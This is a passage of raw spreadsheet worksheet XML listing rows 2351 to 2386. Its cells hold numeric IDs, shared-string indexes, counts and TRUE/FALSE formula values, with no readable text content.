    <row r="2351" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2351" s="1">
        <v>18719</v>
      </c>
      <c r="B2351" t="s">
        <v>0</v>
      </c>
      <c r="C2351" t="s">
        <v>22</v>
      </c>
      <c r="D2351" t="s">
        <v>2716</v>
      </c>
      <c r="E2351" t="s">
        <v>2698</v>
      </c>
      <c r="F2351">
        <v>71</v>
      </c>
      <c r="G2351" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2351" t="s">
        <v>2723</v>
      </c>
      <c r="K2351">
        <v>0</v>
      </c>
      <c r="L2351" t="s">
        <v>2718</v>
      </c>
      <c r="R2351" t="s">
        <v>20</v>
      </c>
      <c r="S2351" t="s">
        <v>2700</v>
      </c>
      <c r="T2351" t="s">
        <v>7</v>
      </c>
      <c r="U2351" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2352" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2352" s="1">
        <v>18720</v>
      </c>
      <c r="B2352" t="s">
        <v>0</v>
      </c>
      <c r="C2352" t="s">
        <v>78</v>
      </c>
      <c r="D2352" t="s">
        <v>2716</v>
      </c>
      <c r="E2352" t="s">
        <v>2698</v>
      </c>
      <c r="F2352">
        <v>71</v>
      </c>
      <c r="G2352" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2352" t="s">
        <v>2724</v>
      </c>
      <c r="K2352">
        <v>0</v>
      </c>
      <c r="L2352" t="s">
        <v>2718</v>
      </c>
      <c r="R2352" t="s">
        <v>20</v>
      </c>
      <c r="S2352" t="s">
        <v>2700</v>
      </c>
      <c r="T2352" t="s">
        <v>7</v>
      </c>
      <c r="U2352" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2353" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2353" s="1">
        <v>18721</v>
      </c>
      <c r="B2353" t="s">
        <v>0</v>
      </c>
      <c r="C2353" t="s">
        <v>22</v>
      </c>
      <c r="D2353" t="s">
        <v>2716</v>
      </c>
      <c r="E2353" t="s">
        <v>2698</v>
      </c>
      <c r="F2353">
        <v>71</v>
      </c>
      <c r="G2353" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2353" t="s">
        <v>2725</v>
      </c>
      <c r="K2353">
        <v>0</v>
      </c>
      <c r="L2353" t="s">
        <v>2718</v>
      </c>
      <c r="R2353" t="s">
        <v>20</v>
      </c>
      <c r="S2353" t="s">
        <v>2700</v>
      </c>
      <c r="T2353" t="s">
        <v>7</v>
      </c>
      <c r="U2353" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2354" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2354" s="1">
        <v>18722</v>
      </c>
      <c r="B2354" t="s">
        <v>0</v>
      </c>
      <c r="C2354" t="s">
        <v>78</v>
      </c>
      <c r="D2354" t="s">
        <v>2716</v>
      </c>
      <c r="E2354" t="s">
        <v>2698</v>
      </c>
      <c r="F2354">
        <v>71</v>
      </c>
      <c r="G2354" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2354" t="s">
        <v>2726</v>
      </c>
      <c r="K2354">
        <v>0</v>
      </c>
      <c r="L2354" t="s">
        <v>2718</v>
      </c>
      <c r="R2354" t="s">
        <v>20</v>
      </c>
      <c r="S2354" t="s">
        <v>2700</v>
      </c>
      <c r="T2354" t="s">
        <v>7</v>
      </c>
      <c r="U2354" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2355" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2355" s="1">
        <v>18723</v>
      </c>
      <c r="B2355" t="s">
        <v>0</v>
      </c>
      <c r="C2355" t="s">
        <v>22</v>
      </c>
      <c r="D2355" t="s">
        <v>2716</v>
      </c>
      <c r="E2355" t="s">
        <v>2698</v>
      </c>
      <c r="F2355">
        <v>71</v>
      </c>
      <c r="G2355" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2355" t="s">
        <v>2727</v>
      </c>
      <c r="K2355">
        <v>0</v>
      </c>
      <c r="L2355" t="s">
        <v>2718</v>
      </c>
      <c r="R2355" t="s">
        <v>20</v>
      </c>
      <c r="S2355" t="s">
        <v>2700</v>
      </c>
      <c r="T2355" t="s">
        <v>7</v>
      </c>
      <c r="U2355" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2356" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2356" s="1">
        <v>18724</v>
      </c>
      <c r="B2356" t="s">
        <v>0</v>
      </c>
      <c r="C2356" t="s">
        <v>78</v>
      </c>
      <c r="D2356" t="s">
        <v>2716</v>
      </c>
      <c r="E2356" t="s">
        <v>2698</v>
      </c>
      <c r="F2356">
        <v>71</v>
      </c>
      <c r="G2356" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2356" t="s">
        <v>2728</v>
      </c>
      <c r="K2356">
        <v>0</v>
      </c>
      <c r="L2356" t="s">
        <v>2718</v>
      </c>
      <c r="R2356" t="s">
        <v>20</v>
      </c>
      <c r="S2356" t="s">
        <v>2700</v>
      </c>
      <c r="T2356" t="s">
        <v>7</v>
      </c>
      <c r="U2356" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2357" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2357" s="1">
        <v>18725</v>
      </c>
      <c r="B2357" t="s">
        <v>0</v>
      </c>
      <c r="C2357" t="s">
        <v>22</v>
      </c>
      <c r="D2357" t="s">
        <v>2716</v>
      </c>
      <c r="E2357" t="s">
        <v>2698</v>
      </c>
      <c r="F2357">
        <v>71</v>
      </c>
      <c r="G2357" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2357" t="s">
        <v>2729</v>
      </c>
      <c r="K2357">
        <v>0</v>
      </c>
      <c r="L2357" t="s">
        <v>2718</v>
      </c>
      <c r="R2357" t="s">
        <v>20</v>
      </c>
      <c r="S2357" t="s">
        <v>2700</v>
      </c>
      <c r="T2357" t="s">
        <v>7</v>
      </c>
      <c r="U2357" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2358" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2358" s="1">
        <v>18726</v>
      </c>
      <c r="B2358" t="s">
        <v>0</v>
      </c>
      <c r="C2358" t="s">
        <v>78</v>
      </c>
      <c r="D2358" t="s">
        <v>2716</v>
      </c>
      <c r="E2358" t="s">
        <v>2698</v>
      </c>
      <c r="F2358">
        <v>71</v>
      </c>
      <c r="G2358" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2358" t="s">
        <v>2730</v>
      </c>
      <c r="K2358">
        <v>0</v>
      </c>
      <c r="L2358" t="s">
        <v>2718</v>
      </c>
      <c r="R2358" t="s">
        <v>20</v>
      </c>
      <c r="S2358" t="s">
        <v>2700</v>
      </c>
      <c r="T2358" t="s">
        <v>7</v>
      </c>
      <c r="U2358" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2359" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2359" s="1">
        <v>18727</v>
      </c>
      <c r="B2359" t="s">
        <v>0</v>
      </c>
      <c r="C2359" t="s">
        <v>22</v>
      </c>
      <c r="D2359" t="s">
        <v>2716</v>
      </c>
      <c r="E2359" t="s">
        <v>2698</v>
      </c>
      <c r="F2359">
        <v>71</v>
      </c>
      <c r="G2359" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2359" t="s">
        <v>2731</v>
      </c>
      <c r="K2359">
        <v>0</v>
      </c>
      <c r="L2359" t="s">
        <v>2718</v>
      </c>
      <c r="R2359" t="s">
        <v>20</v>
      </c>
      <c r="S2359" t="s">
        <v>2700</v>
      </c>
      <c r="T2359" t="s">
        <v>7</v>
      </c>
      <c r="U2359" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2360" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2360" s="1">
        <v>18728</v>
      </c>
      <c r="B2360" t="s">
        <v>10</v>
      </c>
      <c r="C2360" t="s">
        <v>11</v>
      </c>
      <c r="D2360" t="s">
        <v>2732</v>
      </c>
      <c r="E2360" t="s">
        <v>2698</v>
      </c>
      <c r="F2360">
        <v>56</v>
      </c>
      <c r="G2360" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2360" t="s">
        <v>2733</v>
      </c>
      <c r="K2360">
        <v>0</v>
      </c>
      <c r="R2360" t="s">
        <v>20</v>
      </c>
      <c r="S2360" t="s">
        <v>2700</v>
      </c>
      <c r="T2360" t="s">
        <v>7</v>
      </c>
      <c r="U2360" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2361" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2361" s="1">
        <v>18729</v>
      </c>
      <c r="B2361" t="s">
        <v>10</v>
      </c>
      <c r="C2361" t="s">
        <v>11</v>
      </c>
      <c r="D2361" t="s">
        <v>2732</v>
      </c>
      <c r="E2361" t="s">
        <v>2698</v>
      </c>
      <c r="F2361">
        <v>56</v>
      </c>
      <c r="G2361" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2361" t="s">
        <v>2734</v>
      </c>
      <c r="K2361">
        <v>0</v>
      </c>
      <c r="R2361" t="s">
        <v>20</v>
      </c>
      <c r="S2361" t="s">
        <v>2700</v>
      </c>
      <c r="T2361" t="s">
        <v>7</v>
      </c>
      <c r="U2361" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2362" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2362" s="1">
        <v>18730</v>
      </c>
      <c r="B2362" t="s">
        <v>10</v>
      </c>
      <c r="C2362" t="s">
        <v>11</v>
      </c>
      <c r="D2362" t="s">
        <v>2732</v>
      </c>
      <c r="E2362" t="s">
        <v>2698</v>
      </c>
      <c r="F2362">
        <v>56</v>
      </c>
      <c r="G2362" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2362" t="s">
        <v>2735</v>
      </c>
      <c r="K2362">
        <v>0</v>
      </c>
      <c r="R2362" t="s">
        <v>20</v>
      </c>
      <c r="S2362" t="s">
        <v>2700</v>
      </c>
      <c r="T2362" t="s">
        <v>7</v>
      </c>
      <c r="U2362" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2363" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2363" s="1">
        <v>18731</v>
      </c>
      <c r="B2363" t="s">
        <v>10</v>
      </c>
      <c r="C2363" t="s">
        <v>11</v>
      </c>
      <c r="D2363" t="s">
        <v>2732</v>
      </c>
      <c r="E2363" t="s">
        <v>2698</v>
      </c>
      <c r="F2363">
        <v>56</v>
      </c>
      <c r="G2363" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2363" t="s">
        <v>2736</v>
      </c>
      <c r="K2363">
        <v>0</v>
      </c>
      <c r="R2363" t="s">
        <v>20</v>
      </c>
      <c r="S2363" t="s">
        <v>2700</v>
      </c>
      <c r="T2363" t="s">
        <v>7</v>
      </c>
      <c r="U2363" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2364" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2364" s="1">
        <v>18732</v>
      </c>
      <c r="B2364" t="s">
        <v>10</v>
      </c>
      <c r="C2364" t="s">
        <v>11</v>
      </c>
      <c r="D2364" t="s">
        <v>2732</v>
      </c>
      <c r="E2364" t="s">
        <v>2698</v>
      </c>
      <c r="F2364">
        <v>56</v>
      </c>
      <c r="G2364" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2364" t="s">
        <v>2737</v>
      </c>
      <c r="K2364">
        <v>0</v>
      </c>
      <c r="R2364" t="s">
        <v>20</v>
      </c>
      <c r="S2364" t="s">
        <v>2700</v>
      </c>
      <c r="T2364" t="s">
        <v>7</v>
      </c>
      <c r="U2364" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2365" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2365" s="1">
        <v>18733</v>
      </c>
      <c r="B2365" t="s">
        <v>10</v>
      </c>
      <c r="C2365" t="s">
        <v>11</v>
      </c>
      <c r="D2365" t="s">
        <v>2732</v>
      </c>
      <c r="E2365" t="s">
        <v>2698</v>
      </c>
      <c r="F2365">
        <v>56</v>
      </c>
      <c r="G2365" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2365" t="s">
        <v>2738</v>
      </c>
      <c r="K2365">
        <v>0</v>
      </c>
      <c r="R2365" t="s">
        <v>20</v>
      </c>
      <c r="S2365" t="s">
        <v>2700</v>
      </c>
      <c r="T2365" t="s">
        <v>7</v>
      </c>
      <c r="U2365" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2366" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2366" s="1">
        <v>18734</v>
      </c>
      <c r="B2366" t="s">
        <v>10</v>
      </c>
      <c r="C2366" t="s">
        <v>11</v>
      </c>
      <c r="D2366" t="s">
        <v>2732</v>
      </c>
      <c r="E2366" t="s">
        <v>2698</v>
      </c>
      <c r="F2366">
        <v>56</v>
      </c>
      <c r="G2366" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2366" t="s">
        <v>2739</v>
      </c>
      <c r="K2366">
        <v>0</v>
      </c>
      <c r="R2366" t="s">
        <v>20</v>
      </c>
      <c r="S2366" t="s">
        <v>2700</v>
      </c>
      <c r="T2366" t="s">
        <v>7</v>
      </c>
      <c r="U2366" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2367" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2367" s="1">
        <v>18735</v>
      </c>
      <c r="B2367" t="s">
        <v>10</v>
      </c>
      <c r="C2367" t="s">
        <v>11</v>
      </c>
      <c r="D2367" t="s">
        <v>2732</v>
      </c>
      <c r="E2367" t="s">
        <v>2698</v>
      </c>
      <c r="F2367">
        <v>56</v>
      </c>
      <c r="G2367" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2367" t="s">
        <v>2740</v>
      </c>
      <c r="K2367">
        <v>0</v>
      </c>
      <c r="R2367" t="s">
        <v>20</v>
      </c>
      <c r="S2367" t="s">
        <v>2700</v>
      </c>
      <c r="T2367" t="s">
        <v>7</v>
      </c>
      <c r="U2367" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2368" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2368" s="1">
        <v>18736</v>
      </c>
      <c r="B2368" t="s">
        <v>10</v>
      </c>
      <c r="C2368" t="s">
        <v>11</v>
      </c>
      <c r="D2368" t="s">
        <v>2732</v>
      </c>
      <c r="E2368" t="s">
        <v>2698</v>
      </c>
      <c r="F2368">
        <v>56</v>
      </c>
      <c r="G2368" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2368" t="s">
        <v>2741</v>
      </c>
      <c r="K2368">
        <v>0</v>
      </c>
      <c r="R2368" t="s">
        <v>20</v>
      </c>
      <c r="S2368" t="s">
        <v>2700</v>
      </c>
      <c r="T2368" t="s">
        <v>7</v>
      </c>
      <c r="U2368" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2369" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2369" s="1">
        <v>18737</v>
      </c>
      <c r="B2369" t="s">
        <v>10</v>
      </c>
      <c r="C2369" t="s">
        <v>11</v>
      </c>
      <c r="D2369" t="s">
        <v>2732</v>
      </c>
      <c r="E2369" t="s">
        <v>2698</v>
      </c>
      <c r="F2369">
        <v>56</v>
      </c>
      <c r="G2369" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2369" t="s">
        <v>2742</v>
      </c>
      <c r="K2369">
        <v>0</v>
      </c>
      <c r="R2369" t="s">
        <v>20</v>
      </c>
      <c r="S2369" t="s">
        <v>2700</v>
      </c>
      <c r="T2369" t="s">
        <v>7</v>
      </c>
      <c r="U2369" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2370" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2370" s="1">
        <v>18738</v>
      </c>
      <c r="B2370" t="s">
        <v>10</v>
      </c>
      <c r="C2370" t="s">
        <v>11</v>
      </c>
      <c r="D2370" t="s">
        <v>2732</v>
      </c>
      <c r="E2370" t="s">
        <v>2698</v>
      </c>
      <c r="F2370">
        <v>56</v>
      </c>
      <c r="G2370" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2370" t="s">
        <v>2743</v>
      </c>
      <c r="K2370">
        <v>0</v>
      </c>
      <c r="R2370" t="s">
        <v>20</v>
      </c>
      <c r="S2370" t="s">
        <v>2700</v>
      </c>
      <c r="T2370" t="s">
        <v>7</v>
      </c>
      <c r="U2370" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2371" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2371" s="1">
        <v>18739</v>
      </c>
      <c r="B2371" t="s">
        <v>10</v>
      </c>
      <c r="C2371" t="s">
        <v>11</v>
      </c>
      <c r="D2371" t="s">
        <v>2732</v>
      </c>
      <c r="E2371" t="s">
        <v>2698</v>
      </c>
      <c r="F2371">
        <v>56</v>
      </c>
      <c r="G2371" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2371" t="s">
        <v>2744</v>
      </c>
      <c r="K2371">
        <v>0</v>
      </c>
      <c r="R2371" t="s">
        <v>20</v>
      </c>
      <c r="S2371" t="s">
        <v>2700</v>
      </c>
      <c r="T2371" t="s">
        <v>7</v>
      </c>
      <c r="U2371" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2372" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2372" s="1">
        <v>18740</v>
      </c>
      <c r="B2372" t="s">
        <v>10</v>
      </c>
      <c r="C2372" t="s">
        <v>11</v>
      </c>
      <c r="D2372" t="s">
        <v>2732</v>
      </c>
      <c r="E2372" t="s">
        <v>2698</v>
      </c>
      <c r="F2372">
        <v>56</v>
      </c>
      <c r="G2372" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2372" t="s">
        <v>2745</v>
      </c>
      <c r="K2372">
        <v>0</v>
      </c>
      <c r="R2372" t="s">
        <v>20</v>
      </c>
      <c r="S2372" t="s">
        <v>2700</v>
      </c>
      <c r="T2372" t="s">
        <v>7</v>
      </c>
      <c r="U2372" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2373" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2373" s="1">
        <v>18741</v>
      </c>
      <c r="B2373" t="s">
        <v>10</v>
      </c>
      <c r="C2373" t="s">
        <v>11</v>
      </c>
      <c r="D2373" t="s">
        <v>2732</v>
      </c>
      <c r="E2373" t="s">
        <v>2698</v>
      </c>
      <c r="F2373">
        <v>56</v>
      </c>
      <c r="G2373" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2373" t="s">
        <v>2746</v>
      </c>
      <c r="K2373">
        <v>0</v>
      </c>
      <c r="R2373" t="s">
        <v>20</v>
      </c>
      <c r="S2373" t="s">
        <v>2700</v>
      </c>
      <c r="T2373" t="s">
        <v>7</v>
      </c>
      <c r="U2373" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2374" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2374" s="1">
        <v>18742</v>
      </c>
      <c r="B2374" t="s">
        <v>10</v>
      </c>
      <c r="C2374" t="s">
        <v>11</v>
      </c>
      <c r="D2374" t="s">
        <v>2732</v>
      </c>
      <c r="E2374" t="s">
        <v>2698</v>
      </c>
      <c r="F2374">
        <v>56</v>
      </c>
      <c r="G2374" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2374" t="s">
        <v>2747</v>
      </c>
      <c r="K2374">
        <v>0</v>
      </c>
      <c r="R2374" t="s">
        <v>20</v>
      </c>
      <c r="S2374" t="s">
        <v>2700</v>
      </c>
      <c r="T2374" t="s">
        <v>7</v>
      </c>
      <c r="U2374" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2375" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2375" s="1">
        <v>18743</v>
      </c>
      <c r="B2375" t="s">
        <v>10</v>
      </c>
      <c r="C2375" t="s">
        <v>11</v>
      </c>
      <c r="D2375" t="s">
        <v>2732</v>
      </c>
      <c r="E2375" t="s">
        <v>2698</v>
      </c>
      <c r="F2375">
        <v>56</v>
      </c>
      <c r="G2375" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2375" t="s">
        <v>2748</v>
      </c>
      <c r="K2375">
        <v>0</v>
      </c>
      <c r="R2375" t="s">
        <v>20</v>
      </c>
      <c r="S2375" t="s">
        <v>2700</v>
      </c>
      <c r="T2375" t="s">
        <v>7</v>
      </c>
      <c r="U2375" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2376" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2376" s="1">
        <v>18744</v>
      </c>
      <c r="B2376" t="s">
        <v>13</v>
      </c>
      <c r="C2376" t="s">
        <v>14</v>
      </c>
      <c r="D2376" t="s">
        <v>2749</v>
      </c>
      <c r="E2376" t="s">
        <v>2698</v>
      </c>
      <c r="F2376">
        <v>22</v>
      </c>
      <c r="G2376" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2376" t="s">
        <v>2750</v>
      </c>
      <c r="K2376">
        <v>0</v>
      </c>
      <c r="R2376" t="s">
        <v>20</v>
      </c>
      <c r="S2376" t="s">
        <v>2700</v>
      </c>
      <c r="T2376" t="s">
        <v>7</v>
      </c>
      <c r="U2376" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2377" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2377" s="1">
        <v>18745</v>
      </c>
      <c r="B2377" t="s">
        <v>13</v>
      </c>
      <c r="C2377" t="s">
        <v>14</v>
      </c>
      <c r="D2377" t="s">
        <v>2751</v>
      </c>
      <c r="E2377" t="s">
        <v>2752</v>
      </c>
      <c r="F2377">
        <v>6990</v>
      </c>
      <c r="G2377" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2377" t="s">
        <v>2753</v>
      </c>
      <c r="K2377">
        <v>0</v>
      </c>
      <c r="L2377" t="s">
        <v>609</v>
      </c>
      <c r="R2377" t="s">
        <v>20</v>
      </c>
      <c r="S2377" t="s">
        <v>2754</v>
      </c>
      <c r="T2377" t="s">
        <v>7</v>
      </c>
      <c r="U2377" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2378" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2378" s="1">
        <v>18746</v>
      </c>
      <c r="B2378" t="s">
        <v>0</v>
      </c>
      <c r="C2378" t="s">
        <v>22</v>
      </c>
      <c r="D2378" t="s">
        <v>2756</v>
      </c>
      <c r="E2378" t="s">
        <v>2752</v>
      </c>
      <c r="F2378">
        <v>6591</v>
      </c>
      <c r="G2378" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2378" t="s">
        <v>2757</v>
      </c>
      <c r="K2378">
        <v>0</v>
      </c>
      <c r="L2378" t="s">
        <v>2758</v>
      </c>
      <c r="R2378" t="s">
        <v>20</v>
      </c>
      <c r="S2378" t="s">
        <v>2754</v>
      </c>
      <c r="T2378" t="s">
        <v>7</v>
      </c>
      <c r="U2378" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2379" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2379" s="1">
        <v>18747</v>
      </c>
      <c r="B2379" t="s">
        <v>44</v>
      </c>
      <c r="C2379" t="s">
        <v>45</v>
      </c>
      <c r="D2379" t="s">
        <v>2759</v>
      </c>
      <c r="E2379" t="s">
        <v>2752</v>
      </c>
      <c r="F2379">
        <v>6462</v>
      </c>
      <c r="G2379" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2379" t="s">
        <v>2760</v>
      </c>
      <c r="K2379">
        <v>0</v>
      </c>
      <c r="L2379" t="s">
        <v>2761</v>
      </c>
      <c r="R2379" t="s">
        <v>20</v>
      </c>
      <c r="S2379" t="s">
        <v>2754</v>
      </c>
      <c r="T2379" t="s">
        <v>7</v>
      </c>
      <c r="U2379" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2380" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2380" s="1">
        <v>18748</v>
      </c>
      <c r="B2380" t="s">
        <v>44</v>
      </c>
      <c r="C2380" t="s">
        <v>45</v>
      </c>
      <c r="D2380" t="s">
        <v>2762</v>
      </c>
      <c r="E2380" t="s">
        <v>2752</v>
      </c>
      <c r="F2380">
        <v>6430</v>
      </c>
      <c r="G2380" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2380" t="s">
        <v>2763</v>
      </c>
      <c r="K2380">
        <v>0</v>
      </c>
      <c r="L2380" t="s">
        <v>2764</v>
      </c>
      <c r="R2380" t="s">
        <v>20</v>
      </c>
      <c r="S2380" t="s">
        <v>2754</v>
      </c>
      <c r="T2380" t="s">
        <v>7</v>
      </c>
      <c r="U2380" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2381" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2381" s="1">
        <v>18749</v>
      </c>
      <c r="B2381" t="s">
        <v>10</v>
      </c>
      <c r="C2381" t="s">
        <v>57</v>
      </c>
      <c r="D2381" t="s">
        <v>2765</v>
      </c>
      <c r="E2381" t="s">
        <v>2752</v>
      </c>
      <c r="F2381">
        <v>6251</v>
      </c>
      <c r="G2381" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2381" t="s">
        <v>2766</v>
      </c>
      <c r="K2381">
        <v>0</v>
      </c>
      <c r="R2381" t="s">
        <v>20</v>
      </c>
      <c r="S2381" t="s">
        <v>2754</v>
      </c>
      <c r="T2381" t="s">
        <v>7</v>
      </c>
      <c r="U2381" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2382" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2382" s="1">
        <v>18750</v>
      </c>
      <c r="B2382" t="s">
        <v>10</v>
      </c>
      <c r="C2382" t="s">
        <v>57</v>
      </c>
      <c r="D2382" t="s">
        <v>2765</v>
      </c>
      <c r="E2382" t="s">
        <v>2752</v>
      </c>
      <c r="F2382">
        <v>6251</v>
      </c>
      <c r="G2382" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2382" t="s">
        <v>2767</v>
      </c>
      <c r="K2382">
        <v>0</v>
      </c>
      <c r="R2382" t="s">
        <v>20</v>
      </c>
      <c r="S2382" t="s">
        <v>2754</v>
      </c>
      <c r="T2382" t="s">
        <v>7</v>
      </c>
      <c r="U2382" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2383" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2383" s="1">
        <v>18751</v>
      </c>
      <c r="B2383" t="s">
        <v>10</v>
      </c>
      <c r="C2383" t="s">
        <v>57</v>
      </c>
      <c r="D2383" t="s">
        <v>2765</v>
      </c>
      <c r="E2383" t="s">
        <v>2752</v>
      </c>
      <c r="F2383">
        <v>6251</v>
      </c>
      <c r="G2383" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2383" t="s">
        <v>2768</v>
      </c>
      <c r="K2383">
        <v>0</v>
      </c>
      <c r="R2383" t="s">
        <v>20</v>
      </c>
      <c r="S2383" t="s">
        <v>2754</v>
      </c>
      <c r="T2383" t="s">
        <v>7</v>
      </c>
      <c r="U2383" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2384" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2384" s="1">
        <v>18752</v>
      </c>
      <c r="B2384" t="s">
        <v>10</v>
      </c>
      <c r="C2384" t="s">
        <v>57</v>
      </c>
      <c r="D2384" t="s">
        <v>2765</v>
      </c>
      <c r="E2384" t="s">
        <v>2752</v>
      </c>
      <c r="F2384">
        <v>6251</v>
      </c>
      <c r="G2384" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2384" t="s">
        <v>2769</v>
      </c>
      <c r="K2384">
        <v>0</v>
      </c>
      <c r="R2384" t="s">
        <v>20</v>
      </c>
      <c r="S2384" t="s">
        <v>2754</v>
      </c>
      <c r="T2384" t="s">
        <v>7</v>
      </c>
      <c r="U2384" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2385" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2385" s="1">
        <v>18753</v>
      </c>
      <c r="B2385" t="s">
        <v>44</v>
      </c>
      <c r="C2385" t="s">
        <v>45</v>
      </c>
      <c r="D2385" t="s">
        <v>2770</v>
      </c>
      <c r="E2385" t="s">
        <v>2752</v>
      </c>
      <c r="F2385">
        <v>6213</v>
      </c>
      <c r="G2385" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2385" t="s">
        <v>2771</v>
      </c>
      <c r="K2385">
        <v>0</v>
      </c>
      <c r="L2385" t="s">
        <v>2772</v>
      </c>
      <c r="R2385" t="s">
        <v>20</v>
      </c>
      <c r="S2385" t="s">
        <v>2754</v>
      </c>
      <c r="T2385" t="s">
        <v>7</v>
      </c>
      <c r="U2385" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="2386" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2386" s="1">
        <v>18754</v>
      </c>
      <c r="B2386" t="s">
        <v>44</v>
      </c>
      <c r="C2386" t="s">
        <v>45</v>
      </c>
      <c r="D2386" t="s">
        <v>2773</v>
      </c>
      <c r="E2386" t="s">
        <v>2752</v>
      </c>
      <c r="F2386">
        <v>6141</v>
      </c>
      <c r="G2386" t="b">
        <f>FALSE()</f>
